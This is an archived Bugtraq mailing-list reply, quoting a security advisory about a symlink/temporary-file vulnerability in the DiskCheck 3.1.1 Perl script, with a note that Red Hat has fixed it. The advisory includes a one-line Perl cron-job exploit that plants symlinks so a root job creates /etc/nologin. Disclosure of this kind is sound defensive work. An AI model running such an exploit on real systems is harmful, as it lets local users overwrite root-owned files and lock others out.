Bugtraq mailing list archives
Re: Diskcheck 3.1.1 Symlink Vulnerability
From: Stan Bubrouski <secnet () CROSSWINDS NET>
Date: Mon, 7 Aug 2000 11:41:49 -0400
At 05:36 PM 8/5/00 +0900, You, Jin-Ho wrote:
Diskcheck 3.1.1 Symlink Vulnerability 1 Introduction DiskCheck is a Perl script that monitors how much space is available on your hard drive. Basically, it checks your drive space every hour and takes action based on the specifications in the config file /etc/diskcheck.conf. DiskCheck 3.1.1 is available from http://www.kaybee.org/~kirk/html/linux.html and RedHat Powertools 6.x. 2 Vulnerability The command, /etc/cron.hourly/diskcheck.pl is executed with root privilege every hour. It creates a temporary file, whose default name is /tmp/diskusagealert.txt.<pid> defined in /etc/diskcheck.conf, is predictable and is willing to follow symbolic links. This may allow malicious local users to create or overwrite arbitrarily named files. 3 Exploit The following cron job creates the file, /etc/nologin. 0 * * * * perl -e 'foreach $i (1..200) { $pid = $$ + $i; \ symlink("/etc/nologin", "/tmp/diskusagealert.txt.$pid"); }' 4 Solution Relocate the temporary file into the directory where root only can create a file. Example) Edit /etc/diskcheck.conf $tempfile = '/var/local/diskusagealert.txt' # ls -ld /var/local drwxr-xr-x 2 root root 1024 Feb 7 1996 /var/local/ You, Jin-Ho, jhyou () chonnam ac kr
This was reported on the list about a month ago and is fixed in Red Hat's current rawhide, and in Red Hat Pinstripe (7.0 beta). I don't know of any other distros that include it. -Stan Bubrouski
Current thread:
- Diskcheck 3.1.1 Symlink Vulnerability You, Jin-Ho (Aug 07)
- Re: Diskcheck 3.1.1 Symlink Vulnerability Stan Bubrouski (Aug 07)